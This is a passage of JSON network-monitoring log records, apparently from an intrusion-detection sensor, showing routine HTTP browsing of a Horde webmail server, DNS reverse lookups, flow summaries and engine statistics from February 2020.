Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/attachment.png","state":"CLOSED","stored":false,"size":545,"tx_id":6}} {"timestamp":"2020-02-29T00:02:21.000172+0000","flow_id":985912589424072,"event_type":"flow","src_ip":"192.168.10.130","src_port":34688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":1975,"bytes_toclient":9919,"start":"2020-02-29T00:00:44.595400+0000","end":"2020-02-29T00:01:20.225407+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001655+0000","flow_id":876743112598001,"event_type":"flow","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":25,"pkts_toclient":27,"bytes_toserver":3953,"bytes_toclient":25164,"start":"2020-02-29T00:01:13.467441+0000","end":"2020-02-29T00:01:22.403062+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:02:23.001892+0000","flow_id":1463401285748420,"event_type":"flow","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":14,"bytes_toserver":2601,"bytes_toclient":11271,"start":"2020-02-29T00:01:17.198340+0000","end":"2020-02-29T00:01:22.217976+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001995+0000","flow_id":1610366476737736,"event_type":"flow","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1978,"bytes_toclient":8886,"start":"2020-02-29T00:01:17.187592+0000","end":"2020-02-29T00:01:22.218168+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002101+0000","flow_id":788481534977091,"event_type":"flow","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":33,"pkts_toclient":40,"bytes_toserver":8697,"bytes_toclient":43206,"start":"2020-02-29T00:01:17.189507+0000","end":"2020-02-29T00:01:22.697610+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:02:23.002194+0000","flow_id":948834138972290,"event_type":"flow","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":13,"bytes_toserver":2050,"bytes_toclient":12236,"start":"2020-02-29T00:01:17.188546+0000","end":"2020-02-29T00:01:22.218016+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002272+0000","flow_id":116207484000165,"event_type":"flow","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":40,"pkts_toclient":49,"bytes_toserver":10855,"bytes_toclient":46440,"start":"2020-02-29T00:01:17.186277+0000","end":"2020-02-29T00:01:22.699267+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.858656+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20600,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:23.964468+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43411,"proto":"UDP","dns":{"type":"answer","id":20600,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:23.964468+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43411,"proto":"UDP","dns":{"type":"answer","id":20600,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:24.117424+0000","flow_id":1530510154133066,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131}} {"timestamp":"2020-02-29T00:02:24.404100+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete-small.png","state":"CLOSED","stored":false,"size":124,"tx_id":5}} 
{"timestamp":"2020-02-29T00:02:27.000146+0000","event_type":"stats","stats":{"uptime":13799,"capture":{"kernel_packets":132584,"kernel_drops":0},"decoder":{"pkts":132593,"bytes":92021068,"invalid":179,"ipv4":131166,"ipv6":8,"ethernet":132593,"raw":0,"null":0,"sll":0,"tcp":126175,"udp":4798,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2669,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2685,"synack":2676,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1716,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2188,"failed_udp":106},"tx":{"http":4460,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2264}},"flow_mgr":{"closed_pruned":2648,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65528,"rows_empty":6,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20498,"memcap_state":0,"memcap_global":0},"http":{"memuse":54024,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:28.571788+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737}} {"timestamp":"2020-02-29T00:02:28.573297+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52664,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":1737,"tx_id":0}} {"timestamp":"2020-02-29T00:02:28.578970+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58895,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:28.617395+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:02:28.690397+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58895,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:28.690397+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58895,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:28.707225+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58896,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:02:28.812490+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:28.812490+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:29.000724+0000","flow_id":136591399180898,"event_type":"flow","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":1777,"bytes_toclient":1792,"start":"2020-02-29T00:01:23.121442+0000","end":"2020-02-29T00:01:28.332392+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:29.118397+0000","flow_id":1530510154133066,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30700,"tx_id":0}} {"timestamp":"2020-02-29T00:02:30.003648+0000","flow_id":1393011066924782,"event_type":"flow","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":15,"bytes_toserver":1828,"bytes_toclient":11853,"start":"2020-02-29T00:01:19.978670+0000","end":"2020-02-29T00:01:29.023351+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:02:33.551797+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37713,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:33.574791+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52664,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":1}} {"timestamp":"2020-02-29T00:02:33.658408+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35837,"proto":"UDP","dns":{"type":"answer","id":37713,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:33.658408+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35837,"proto":"UDP","dns":{"type":"answer","id":37713,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:33.756645+0000","flow_id":432102333557313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287}} {"timestamp":"2020-02-29T00:02:34.000216+0000","event_type":"stats","stats":{"uptime":13806,"capture":{"kernel_packets":132616,"kernel_drops":0},"decoder":{"pkts":132628,"bytes":92028677,"invalid":180,"ipv4":131199,"ipv6":8,"ethernet":132628,"raw":0,"null":0,"sll":0,"tcp":126203,"udp":4802,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2672,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2688,"synack":2679,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1717,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2189,"failed_udp":106},"tx":{"http":4462,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2266}},"flow_mgr":{"closed_pruned":2650,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21159,"memcap_state":0,"memcap_global":0},"http":{"memuse":37055,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:34.001094+0000","flow_id":849006199346554,"event_type":"flow","src_ip":"192.168.10.122","src_port":43852,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:32.890234+0000","end":"2020-02-28T23:57:33.002100+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:34.001823+0000","flow_id":1794109457924391,"event_type":"flow","src_ip":"192.168.10.122","src_port":51275,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:33.622887+0000","end":"2020-02-28T23:57:33.734194+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:36.000710+0000","flow_id":679183207983578,"event_type":"flow","src_ip":"192.168.10.130","src_port":34694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":18,"bytes_toserver":1670,"bytes_toclient":20546,"start":"2020-02-29T00:01:29.944602+0000","end":"2020-02-29T00:01:35.171147+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:38.757982+0000","flow_id":432102333557313,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34702,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16438,"tx_id":0}} {"timestamp":"2020-02-29T00:02:39.033401+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39579,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1586,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:39.144484+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39579,"proto":"UDP","dns":{"type":"answer","id":1586,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:39.144484+0000","flow_id":1521357579846265,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39579,"proto":"UDP","dns":{"type":"answer","id":1586,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:39.200940+0000","flow_id":667500901523119,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4211}} 
{"timestamp":"2020-02-29T00:02:40.000187+0000","flow_id":1615370099269153,"event_type":"flow","src_ip":"192.168.10.122","src_port":58514,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:38.761377+0000","end":"2020-02-28T23:57:38.872715+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:40.000436+0000","flow_id":2191913624185226,"event_type":"flow","src_ip":"192.168.10.122","src_port":36276,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:38.567690+0000","end":"2020-02-28T23:57:38.678900+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:41.000155+0000","event_type":"stats","stats":{"uptime":13813,"capture":{"kernel_packets":132655,"kernel_drops":0},"decoder":{"pkts":132655,"bytes":92034766,"invalid":180,"ipv4":131226,"ipv6":8,"ethernet":132655,"raw":0,"null":0,"sll":0,"tcp":126227,"udp":4805,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2674,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2690,"synack":2681,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app
_layer":{"flow":{"http":1718,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2191,"failed_udp":106},"tx":{"http":4463,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2268}},"flow_mgr":{"closed_pruned":2651,"new_pruned":15,"est_pruned":2237,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20166,"memcap_state":0,"memcap_global":0},"http":{"memuse":53939,"memcap":0}}} {"timestamp":"2020-02-29T00:02:41.140036+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42164,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35317,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:41.244983+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42164,"proto":"UDP","dns":{"type":"answer","id":35317,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:41.244983+0000","flow_id":384282168206084,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42164,"proto":"UDP","dns":{"type":"answer","id":35317,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:41.420240+0000","flow_id":612061463836783,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6897}} {"timestamp":"2020-02-29T00:02:44.205072+0000","flow_id":667500901523119,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34704,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4211},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18534,"tx_id":0}} {"timestamp":"2020-02-29T00:02:46.228358+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33488,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25550,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:46.339559+0000","flow_id":2218946168519686,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33488,"proto":"UDP","dns":{"type":"answer","id":25550,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 